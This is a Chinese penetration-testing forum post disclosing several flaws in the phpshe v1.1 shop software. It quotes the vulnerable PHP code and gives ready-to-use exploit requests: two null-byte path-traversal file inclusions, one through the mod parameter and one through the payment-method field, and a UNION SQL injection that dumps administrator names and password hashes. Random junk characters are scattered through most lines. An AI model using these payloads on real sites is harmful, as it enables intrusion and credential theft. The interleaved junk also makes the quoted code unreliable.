找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2437|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/! \& ^" f6 W' a' p$ v! s3 S# K
/* Phpshe v1.1 Vulnerability2 p( c5 f+ q( L. q& h1 L
/* ========================- b" _2 V; h6 O: B
/* By: : Kn1f38 }" l# Y! n4 B7 B  L
/* E-Mail : 681796@qq.com& p2 y) P: e* m- F2 ~+ c7 q
/*******************************************************/  A3 m7 i4 j: |& O5 Q
0×00 整体大概参数传输: Q# A6 V, }: E

+ c5 g4 A* p7 }% W5 i9 [
9 h4 O- Y9 X+ D' X/ w+ I' N
% T3 t2 v0 P9 n: f5 ]' n; |//common.php
4 |1 V2 S+ x% @5 M( O+ ?if (get_magic_quotes_gpc()) {
; V/ P5 U1 t& W9 ^( j, f!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');. V) [3 K& @1 L/ I  W
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
9 |( k7 Z7 L0 S: j  H( R}7 @! ^2 [  p% p. D& a7 @  n
else {
2 h$ B) u. U( x3 p1 A7 ]" p!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');  U& y) y6 J0 q6 O: U$ j
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');+ S& e+ C" D, s$ o, q- n
}
+ X9 ~8 f- X% Z( k2 fsession_start();" S' R* N: |8 a; X6 A, b
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');7 D/ h& E! J+ Y0 k
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
7 \& I! ]' S/ W* J. R1 V5 G' v- h8 L+ `% }# S) a; T; R3 i2 L
0×01 包含漏洞0 T+ F4 n$ w7 T& }! H- O5 h

6 A/ ^# U( Q/ t+ _
/ n- b9 `0 a1 R//首页文件5 L/ S- n4 ?( c- d
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);  f* K, r4 M+ J0 ?/ l0 _* q
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
  K9 q* ?& _4 V8 N- I7 [9 a/ z- Epe_result();
1 I/ ~4 K( c- A: N! H?>; L! p' T% E: b2 u, R
//common 文件 第15行开始% `% E( c8 C# l  g3 h
url路由配置9 w7 y8 R' e8 |- v
$module = $mod = $act = 'index';
; }8 E4 i  B  [- c+ U8 V$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);: `# k* R4 j. H8 m4 z2 o7 n( V) L: e2 C
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);! l, h4 T! ^: j# N3 E. T
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
$ `0 Q" t0 ?- B7 F. m8 e( X9 y% m//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
, h# P+ G( \( b


  H: l. _1 @* c. l/ u2 d7 M
9 K& H8 A& O0 }0 r; M7 f 0×02 搜索注入
8 y/ u( A# q% s' K/ H0 c! ~" }7 l
& ~1 E/ A! I; k<code id="code2">

//product.php文件
# O1 U6 A, M( `6 X$ l4 l5 ^: ]' xcase 'list':
2 f* c. [" t2 K+ ^; c- w9 t$category_id = intval($id);
( S( f: g! L1 A$info = $db->pe_select('category', array('category_id'=>$category_id));
8 ?; h( c; `, {! o' x7 l+ o//搜索
+ @" b$ d5 p. S' V. n& n0 E$ q$sqlwhere = " and `product_state` = 1";( l% e! A4 y. {! M; C
pe_lead('hook/category.hook.php');
/ P- S7 o2 z; c, r; v5 p, Pif ($category_id) {# N) ]: H+ h2 Z& R, S8 d
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
" ]. a  C9 ^- ~# x}# {9 H: Z, D6 H; y/ S
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
& q2 j" p$ @, e2 N* [if ($_g_orderby) {$ _5 _4 n2 r; H, z2 n9 X
$orderby = explode('_', $_g_orderby);1 Y" Y  W: i" h) H- s8 _% c0 v
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";  j6 ~# }* x. v  e; D
}, w, y- l  X0 `* a% |# D9 W
else {% B  e9 L8 J- W7 b" m: a8 ]$ Y- ]
$sqlwhere .= " order by `product_id` desc";
* O6 C7 o- Z) T7 s1 b) B}
4 Y5 N1 j7 j  L& R0 O4 _$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
3 t3 P) N% X) B, s5 [# O5 M) S* H//热卖排行
' \0 _: U" h7 {' k5 M. j$product_hotlist = product_hotlist();1 ]" V" z+ P- N1 v$ Z3 _" h: n
//当前路径
4 J# k8 U, i% Y- z2 A$nowpath = category_path($category_id);& Y- x) v+ z' s# J
$seo = pe_seo($info['category_name']);' ?. F0 e3 Z) [' W6 E' ?6 S
include(pe_tpl('product_list.html'));% [6 _' e, t# v. f8 t, D: _2 Q; R
//跟进selectall函数库
! a! @$ r. j7 u8 L9 D1 x% Q$ s, P: f# Qpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
7 j) A+ K. q& t6 Z6 I{7 Y2 Z$ o* W2 h: O& c2 P& n
//处理条件语句) h7 K9 u, v& k8 A+ f3 ?
$sqlwhere = $this->_dowhere($where);: a. Y  c; ~' x9 B
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
1 f4 ?/ \$ V( J7 J, w}
4 l0 f% I/ T3 G3 t) t" X+ W: R//exp
, m/ w2 X. J" G- J( nproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
# X' S( C$ k& G: A$ r* P: o4 i' E8 ~

</code>- e4 J- f+ f9 u
- N( O! Z7 w; v9 `6 s( \+ j
0×03 包含漏洞2
- `, g5 }6 t4 k9 a& m; T4 \8 ]" \" j) d # p! t" E! i2 A) l; d  X
<code id="code3">

//order.php

case 'pay':


" x! e% T' z& j! t4 r0 b2 {$order_id = pe_dbhold($_g_id);


  V( y# F5 o9 \0 Q$cache_payway = cache::get('payway');


* i' M1 E( C! yforeach($cache_payway as $k => $v) {


& B% y7 M/ \; a- ^4 h- r8 I5 }3 O$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


& u) Q% q6 [  L! f8 Q. M, A5 `, @& k9 _if ($k == 'bank') {

4 a( h% }5 V& g5 f1 o: D
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

* i7 F, t6 B8 p2 \* l
}


( t  {2 B- G" z& `1 k1 U6 F}


! ?/ R2 ^. s9 R1 R- t$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

" o% I% J+ X) d! t) C
!$order['order_id'] && pe_error('订单号错误...');


# N+ M& e* @5 [% S" j1 dif (isset($_p_pesubmit)) {


# U# S6 `; h0 A* n3 U! fif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


" M. c+ G7 l- [+ L6 ?$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


8 I+ ~# ~' y  ?! {+ J* Fforeach ($info_list as $v) {

. W* a9 n+ |  ^2 j
$order['order_name'] .= "{$v['product_name']};";
# d( X/ m: M! x! w, L

* b. B* s' |: I4 b2 b* ~
}

' S5 S. u  L& K+ c2 E: m
echo '正在为您连接支付网站,请稍后...';

- W6 V; k+ a8 H' S
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

& w' Z. V% m( D2 u' p3 R7 _
}//当一切准备好的时候就可以进行"鸡肋包含了"


, `& w8 q+ U2 _! |. `8 `4 ^else {


) V: j0 C8 p4 T, X) Y* npe_error('支付错误...');

& V9 O% o1 s5 S+ C$ B
}

) \: Z: c8 k3 x2 Y- R; T7 d1 a6 X
}

. H% |* }( J- @8 J  }) A
$seo = pe_seo('选择支付方式');

9 H$ }3 b' ]# k9 k
include(pe_tpl('order_pay.html'));


* y3 d; q1 W0 j: jbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>* T2 b- L8 r1 E( I

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表